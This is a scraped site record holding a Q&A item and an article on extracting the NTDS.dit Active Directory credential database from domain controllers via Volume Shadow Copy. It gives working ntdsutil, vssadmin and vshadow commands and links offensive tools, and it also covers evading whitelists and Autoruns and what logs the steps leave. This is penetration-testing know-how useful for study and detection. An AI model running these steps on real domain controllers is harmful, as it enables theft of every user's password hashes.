[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fby8uKvcio8Ky3jsZOJ0uNphg_ArmvFY6mAKbpv3Okoo":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},495,"How can you access files inside a Volume Shadow Copy snapshot without mounting it as a drive letter?","You can access snapshot files by using the device path `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyXX` directly in `copy` commands, or by creating a symbolic link with `mklink \u002Fd c:\\testvsc \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy12\\`. This allows browsing the snapshot like a normal folder, as demonstrated in the original article. After finishing, delete the link with `rd c:\\testvsc`. This technique is often used in [Domain Penetration - Obtaining the NTDS.dit File from Domain Controller Servers](\u002Fnews\u002Fdomain-penetration-obtaining-the-ntds-dit-file-from-domain-controller-servers) to quietly extract the NTDS.dit file.","\u003Cp>You can access snapshot files by using the device path `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopyXX` directly in `copy` commands, or by creating a symbolic link with `mklink \u002Fd c:\\testvsc \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy12\\`. This allows browsing the snapshot like a normal folder, as demonstrated in the original article. After finishing, delete the link with `rd c:\\testvsc`. This technique is often used in [Domain Penetration - Obtaining the NTDS.dit File from Domain Controller Servers](\u002Fnews\u002Fdomain-penetration-obtaining-the-ntds-dit-file-from-domain-controller-servers) to quietly extract the NTDS.dit file.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-obtaining-the-ntds-dit-file-from-domain-controller-servers\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-you-access-files-inside-a-volume-shadow-copy-snapshot-without-mounting-i-1777483176238","Volume Shadow Copy, symbolic link, mklink, NTDS.dit extraction, file access",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},123,"Domain Penetration - Obtaining the NTDS.dit File from Domain Controller Servers","domain-penetration-obtaining-the-ntds-dit-file-from-domain-controller-servers","Learn methods to obtain NTDS.dit from domain controllers using Volume Shadow Copy, including ntdsutil, vssadmin, and vshadow.exe for security testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Technical Summary of Exporting All User Hashes in the Current Domain', we introduced copying the ntds.dit file via Volume Shadow Copy to export all user hashes within the domain. This article will attempt to systematically summarize various different methods.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Multiple implementation methods\u003C\u002Fli>\u003Cli>Comparison of advantages and disadvantages\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Obtaining the Domain Controller NTDS.dit File via Volume Shadow Copy\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test systems:\u003C\u002Fp>\u003Cul>\u003Cli>Server 2008 R2 x64\u003C\u002Fli>\u003Cli>Server 2012 R2 x64\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Volume Shadow Copy Service:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>For data backup\u003C\u002Fli>\u003Cli>Supports Windows Server 2003 and above operating systems\u003C\u002Fli>\u003Cli>The system automatically creates data backups under specific conditions by default, such as after patch installation. On Win7 systems, backups are automatically created approximately every week, but this timing is not guaranteed\u003C\u002Fli>\u003Cli>Disabling VSS will affect normal system functions, such as System Restore and Windows Server Backup\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>1. ntdsutil\u003C\u002Fh3>\u003Cp>Installed by default in domain environments\u003C\u002Fp>\u003Cp>Supported systems:\u003C\u002Fp>\u003Cul>\u003Cli>Server 2003\u003C\u002Fli>\u003Cli>Server 2008\u003C\u002Fli>\u003Cli>Server 2012\u003C\u002Fli>\u003Cli>...\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>Common commands:\u003C\u002Fh4>\u003Cp>(1) Query current snapshot list\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"List All\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Query mounted snapshot list\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"List Mounted\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Create snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"activate instance ntds\" create quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Mount snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"mount GUID\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(5) Unmount snapshot:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"unmount GUID\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(6) Delete snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"delete GUID\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>Actual test:\u003C\u002Fh4>\u003Cp>(1) Query current system snapshots\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"List All\" quit quit\u003Cbr>ntdsutil snapshot \"List Mounted\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Create snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"activate instance ntds\" create quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>guid is {6e31c0ab-c517-420b-845d-c38acbf77ab9}\u003C\u002Fp>\u003Cp>as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017969910_0_6332a04ef1.jpeg\">\u003C\u002Fp>\u003Cp>(3) Mount snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"mount {6e31c0ab-c517-420b-845d-c38acbf77ab9}\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Snapshot mounted as C:\\$SNAP_201802270645_VOLUMEC$\\, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017976010_1_b6fedf30e0.jpeg\">\u003C\u002Fp>\u003Cp>(4) Copy ntds.dit\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy C:\\$SNAP_201802270645_VOLUMEC$\\windows\\NTDS\\ntds.dit c:\\ntds.dit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(5) Unmount snapshot:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"unmount {6e31c0ab-c517-420b-845d-c38acbf77ab9}\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(6) Delete snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"delete {6e31c0ab-c517-420b-845d-c38acbf77ab9}\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2、vssadmin\u003C\u002Fh3>\u003Cp>Installed by default in domain environment\u003C\u002Fp>\u003Cp>Supported Systems:\u003C\u002Fp>\u003Cul>\u003Cli>Server 2008\u003C\u002Fli>\u003Cli>Server 2012\u003C\u002Fli>\u003Cli>...\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>Common Commands:\u003C\u002Fh4>\u003Cp>(1) Query current system snapshots\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin list shadows\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Create a snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin create shadow \u002Ffor=c:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Delete a snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin delete shadows \u002Ffor=c: \u002Fquiet\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>Actual Testing:\u003C\u002Fh4>\u003Cp>(1) Query current system snapshots\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin list shadows\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Create a snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin create shadow \u002Ffor=c:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain Shadow Copy Volume Name as \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy12\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017986518_2_0f2af510c5.jpeg\">\u003C\u002Fp>\u003Cp>(3) Copy ntds.dit\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy12\\windows\\NTDS\\ntds.dit c:\\ntds.dit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Delete snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin delete shadows \u002Ffor=c: \u002Fquiet\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. vshadow.exe\u003C\u002Fh3>\u003Cp>Not supported by default in the system, this tool can be obtained from the Microsoft Windows Software Development Kit (SDK)\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>64-bit systems require the 64-bit version of vshadow.exe\u003C\u002Fp>\u003Cp>Download links for vshadow.exe versions available for different systems:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fedgylogic.com\u002Fblog\u002Fvshadow-exe-versions\u002F\u003C\u002Fp>\u003Ch4>Common commands:\u003C\u002Fh4>\u003Cp>(1) Query current system snapshots\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow.exe -q\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Create a snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow.exe -p -nw C:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cp>-p persistent, not deleted by backup operations or system restart\u003C\u002Fp>\u003Cp>-nw no writers, used to improve creation speed\u003C\u002Fp>\u003Cp>C: corresponds to drive C\u003C\u002Fp>\u003Cp>(3) Delete snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow -dx=ShadowCopySetId\u003Cbr>\u003Cbr>vshadow -ds=ShadowCopyId\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>Actual testing:\u003C\u002Fh4>\u003Cp>(1) Query current system snapshots\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow.exe -q\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Create a snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow.exe -p -nw C:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtained SnapshotSetID as {809b77cc-cf9a-4101-b802-08e97d10e613}\u003C\u002Fp>\u003Cp>Obtained SnapshotID as {ef99d039-9a38-4e8b-9f57-e3113d464f76}\u003C\u002Fp>\u003Cp>Obtained shadow copy device name as \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy10\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017990829_3_5d6ab2e711.jpeg\">\u003C\u002Fp>\u003Cp>(3) Copy ntds.dit\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy10\\windows\\NTDS\\ntds.dit c:\\ntds.dit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Delete snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow -dx={809b77cc-cf9a-4101-b802-08e97d10e613}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow -ds={ef99d039-9a38-4e8b-9f57-e3113d464f76}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. vssown.vbs\u003C\u002Fh3>\u003Cp>Reference download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.com\u002Fborigue\u002Fptscripts\u002Fmaster\u002Fwindows\u002Fvssown.vbs\u003C\u002Fp>\u003Cp>Essentially operates on ShadowCopy through WMI\u003C\u002Fp>\u003Cp>Query snapshot information via WMI:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ShadowCopy GET DeviceObject,ID,InstallDate \u002FFORMAT:list\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>PowerShell implementation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fsamratashok\u002Fnishang\u002Fblob\u002Fmaster\u002FGather\u002FCopy-VSS.ps1\u003C\u002Fp>\u003Ch3>Extensions\u003C\u002Fh3>\u003Ch4>1. Log files\u003C\u002Fh4>\u003Cp>Invoking Volume Shadow Copy Service generates log files under System, with Event ID 7036\u003C\u002Fp>\u003Cp>Executing ntdsutil snapshot \"activate instance ntds\" create quit quit additionally generates log files with Event ID 98\u003C\u002Fp>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017995435_4_b651f87348.jpeg\">\u003C\u002Fp>\u003Ch4>2. Accessing files in snapshots\u003C\u002Fh4>\u003Cp>View snapshot list:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin list shadows\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Cannot directly access files in \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy12\u003C\u002Fp>\u003Cp>Files in the snapshot can be accessed by creating symbolic links:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mklink \u002Fd c:\\testvsc \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy12\\\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017998630_5_4920a60005.jpeg\">\u003C\u002Fp>\u003Cp>Delete symbolic link:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rd c:\\testvsc\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Exploitation idea:\u003C\u002Fp>\u003Cp>If snapshot files exist in the current system, historical files of the system can be accessed\u003C\u002Fp>\u003Ch4>3. Executing commands using vshadow\u003C\u002Fh4>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fbohops.com\u002F2018\u002F02\u002F10\u002Fvshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction\u002F\u003C\u002Fp>\u003Cp>Execute command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow.exe -nw -exec=c:\\windows\\system32\\notepad.exe c:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After execution, the background process VSSVC.exe exists, and the Volume Shadow Copy service is shown as running, requiring manual termination of the VSSVC.exe process\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Manually terminating the VSSVC.exe process generates log 7034\u003C\u002Fp>\u003Cp>Exploitation approach:\u003C\u002Fp>\u003Cp>vshadow.exe contains Microsoft signatures, allowing it to bypass certain whitelist restrictions. If set as a startup item, it does not appear in Autoruns' default startup list\u003C\u002Fp>\u003Ch2>0x03 Obtaining the domain controller's NTDS.dit file via NinjaCopy\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FExfiltration\u002FInvoke-NinjaCopy.ps1\u003C\u002Fp>\u003Cp>Does not invoke the Volume Shadow Copy service, thus no log file 7036 is generated\u003C\u002Fp>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article compiles various methods for obtaining the domain controller's NTDS.dit file, tests their usage environments, and compares their advantages and disadvantages.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Technical Summary of Exporting All User Hashes in the Current Domain', we introduced copying the ntds.dit file via Volume Shadow Copy to export all user hashes within the domain. This article will attempt to systematically summarize various different methods.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Multiple implementation methods\u003C\u002Fli>\u003Cli>Comparison of advantages and disadvantages\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Obtaining the Domain Controller NTDS.dit File via Volume Shadow Copy\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test systems:\u003C\u002Fp>\u003Cul>\u003Cli>Server 2008 R2 x64\u003C\u002Fli>\u003Cli>Server 2012 R2 x64\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Volume Shadow Copy Service:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>For data backup\u003C\u002Fli>\u003Cli>Supports Windows Server 2003 and above operating systems\u003C\u002Fli>\u003Cli>The system automatically creates data backups under specific conditions by default, such as after patch installation. On Win7 systems, backups are automatically created approximately every week, but this timing is not guaranteed\u003C\u002Fli>\u003Cli>Disabling VSS will affect normal system functions, such as System Restore and Windows Server Backup\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>1. ntdsutil\u003C\u002Fh3>\u003Cp>Installed by default in domain environments\u003C\u002Fp>\u003Cp>Supported systems:\u003C\u002Fp>\u003Cul>\u003Cli>Server 2003\u003C\u002Fli>\u003Cli>Server 2008\u003C\u002Fli>\u003Cli>Server 2012\u003C\u002Fli>\u003Cli>...\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>Common commands:\u003C\u002Fh4>\u003Cp>(1) Query current snapshot list\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"List All\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Query mounted snapshot list\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"List Mounted\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Create snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"activate instance ntds\" create quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Mount snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"mount GUID\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(5) Unmount snapshot:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"unmount GUID\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(6) Delete snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"delete GUID\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>Actual test:\u003C\u002Fh4>\u003Cp>(1) Query current system snapshots\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"List All\" quit quit\u003Cbr>ntdsutil snapshot \"List Mounted\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Create snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"activate instance ntds\" create quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>guid is {6e31c0ab-c517-420b-845d-c38acbf77ab9}\u003C\u002Fp>\u003Cp>as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017969910_0_6332a04ef1-1.jpeg\">\u003C\u002Fp>\u003Cp>(3) Mount snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"mount {6e31c0ab-c517-420b-845d-c38acbf77ab9}\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Snapshot mounted as C:\\$SNAP_201802270645_VOLUMEC$\\, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017976010_1_b6fedf30e0-1.jpeg\">\u003C\u002Fp>\u003Cp>(4) Copy ntds.dit\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy C:\\$SNAP_201802270645_VOLUMEC$\\windows\\NTDS\\ntds.dit c:\\ntds.dit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(5) Unmount snapshot:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"unmount {6e31c0ab-c517-420b-845d-c38acbf77ab9}\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(6) Delete snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ntdsutil snapshot \"delete {6e31c0ab-c517-420b-845d-c38acbf77ab9}\" quit quit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2、vssadmin\u003C\u002Fh3>\u003Cp>Installed by default in domain environment\u003C\u002Fp>\u003Cp>Supported Systems:\u003C\u002Fp>\u003Cul>\u003Cli>Server 2008\u003C\u002Fli>\u003Cli>Server 2012\u003C\u002Fli>\u003Cli>...\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>Common Commands:\u003C\u002Fh4>\u003Cp>(1) Query current system snapshots\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin list shadows\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Create a snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin create shadow \u002Ffor=c:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Delete a snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin delete shadows \u002Ffor=c: \u002Fquiet\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>Actual Testing:\u003C\u002Fh4>\u003Cp>(1) Query current system snapshots\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin list shadows\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Create a snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin create shadow \u002Ffor=c:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain Shadow Copy Volume Name as \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy12\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017986518_2_0f2af510c5-1.jpeg\">\u003C\u002Fp>\u003Cp>(3) Copy 